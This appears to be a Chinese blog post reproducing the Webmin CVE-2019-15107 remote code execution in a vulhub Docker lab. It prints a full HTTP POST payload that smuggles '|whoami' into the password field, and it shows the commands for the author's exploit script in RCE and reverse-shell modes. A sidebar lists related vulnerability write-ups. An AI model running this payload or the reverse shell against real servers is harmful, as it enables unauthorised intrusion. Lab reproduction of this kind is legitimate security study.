CVE-2019-15107 Webmin RCE漏洞复现

简介: 环境搭建:进入镜像目录

一、环境搭建:

进入镜像目录:


cd vulhub/webmin/CVE-2019-15107

启动环境:


docker-compose up -d

访问:yourip:10000即可




二、漏洞描述:

该漏洞允许恶意第三方在缺少输入验证的情况下而执行恶意代码,由于password_change.cgi文件在重置密码功能中存在一个代码执行漏洞,允许恶意第三方在缺少输入验证的情况下而执行恶意代码


影响的版本:Webmin<=1.920

漏洞利用条件:版本满足要求,且服务器的配置文件允许修改密码时,在不知道webmin的用户和密码条件下,可以任意执行代码。




三、漏洞复现:

1、首先进入容器修改root的密码:

然后用系统账号密码登陆进后台,开启修改密码功能:

vulhub默认已经设置好了:


确认配置文件:


cat /etc/webmin/miniserv.conf


2、构造payload进行RCE:






POST /password_change.cgi HTTP/1.1Host: 192.168.136.131:10000User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0Accept: application/json, text/javascript, */*; q=0.01Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateDNT: 1X-Requested-From: webminX-Requested-From-Tab: webminX-Requested-With: XMLHttpRequestReferer: https://192.168.136.131:10000/webmin/edit_session.cgi?xnavigation=1Cookie: redirect=1; testing=1; sid=80c904aa71f996b05d4c7ec9c4260335; sessiontest=1Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 50
user=panda&old=test|whoami&new1=123456&new2=123456

执行结果:

四、漏洞EXP(自写):

脚本执行效果:

1、RCE:


python3 CVE-2019-15107.py https://192.168.136.131:10000 -f rce


2、反弹shell:


python3 CVE-2019-15107.py https://192.168.136.131:10000 -f r_shell -l 192.168.136.129 -p 7777


成功反弹shell:


脚本已经打包好了,需要的看官后台留言:webmin exp


注意:脚本仅作为学习和讨论使用,禁止利用其进行任何违法行为,与作者无关!

注意:脚本仅作为学习和讨论使用,禁止利用其进行任何违法行为,与作者无关!

目录
相关文章
|
存储 监控 安全
Zabbix登录绕过漏洞复现(CVE-2022-23131)
最近在复现zabbix的漏洞(CVE-2022-23131),偶然间拿到了国外某公司zabbix服务器。Zabbix Sia Zabbix是拉脱维亚Zabbix SIA(Zabbix Sia)公司的一套开源的监控系统。该系统支持网络监控、服务器监控、云监控和应用监控等。Zabbix Frontend 存在安全漏洞,该漏洞源于在启用 SAML SSO 身份验证(非默认)的情况下,恶意行为者可以修改会话数据,因为存储在会话中的用户登录未经过验证。 未经身份验证的恶意攻击者可能会利用此问题来提升权限并获得对 Zabbix 前端的管理员访问权限。
1837 0
Zabbix登录绕过漏洞复现(CVE-2022-23131)
|
安全 Ubuntu Linux
CVE-2021-4034 pkexec提权漏洞
Linux Polkit 的 pkexec程序中发现了一个本地权限提升漏洞。pkexec应用程序是一个 setuid 工具,旨在允许非特权用户根据预定义的策略以特权用户身份运行命令。
334 1
|
安全 Python Windows
RARLAB WinRAR 代码执行漏洞RCE (CVE-2023-38831)
WinRAR 是一款功能强大的压缩包管理器,它是档案工具RAR在 Windows环境下的图形界面。 该软件可用于备份数据,缩减电子邮件附件的大小,解压缩从 Internet 上下载的RAR、ZIP及其它类型文件,并且可以新建 RAR 及 ZIP 格式等的压缩类文件。 从5.60版开始,WinRAR启用了新的图标,但用户仍可以通过官网提供的主题包换回原版风格的图标。
156 2
|
安全 测试技术
漏洞复现--CVE-2020-0796getshell
漏洞复现--CVE-2020-0796getshell
漏洞复现--CVE-2020-0796getshell
|
安全 NoSQL Shell
Weblogic ssrf漏洞复现---从0到1
利用Ubuntu16.04,安装docker,要以root身份执行
302 0
Weblogic ssrf漏洞复现---从0到1
|
XML 安全 Oracle
Weblogic XMLDecoder 远程代码执行漏洞 CVE-2017-10271 漏洞复现
Weblogic XMLDecoder 远程代码执行漏洞 CVE-2017-10271 漏洞复现
160 0
|
安全 jenkins Java
CVE-2017-1000353 Jenkins漏洞复现系列(一)
Jenkins未授权远程代码执行漏洞, 允许攻击者将序列化的Java SignedObject对象传输给Jenkins CLI处理,反序列化ObjectInputStream作为Command对象,这将绕过基于黑名单的保护机制, 导致代码执行
835 0
|
安全 Unix Linux
CVE-2020-15778 Openssh命令注入漏洞复现
scp是用于在计算机之间复制文件的程序。它使用SSH协议。在大多数Linux和Unix发行版中默认都包含它。
1243 0
|
安全 Java 应用服务中间件
CVE-2023-21839漏洞本地简单复现
CVE-2023-21839漏洞本地简单复现
1105 0
|
安全 Java fastjson
Log4J 漏洞复现+漏洞靶场
Log4J 漏洞复现+漏洞靶场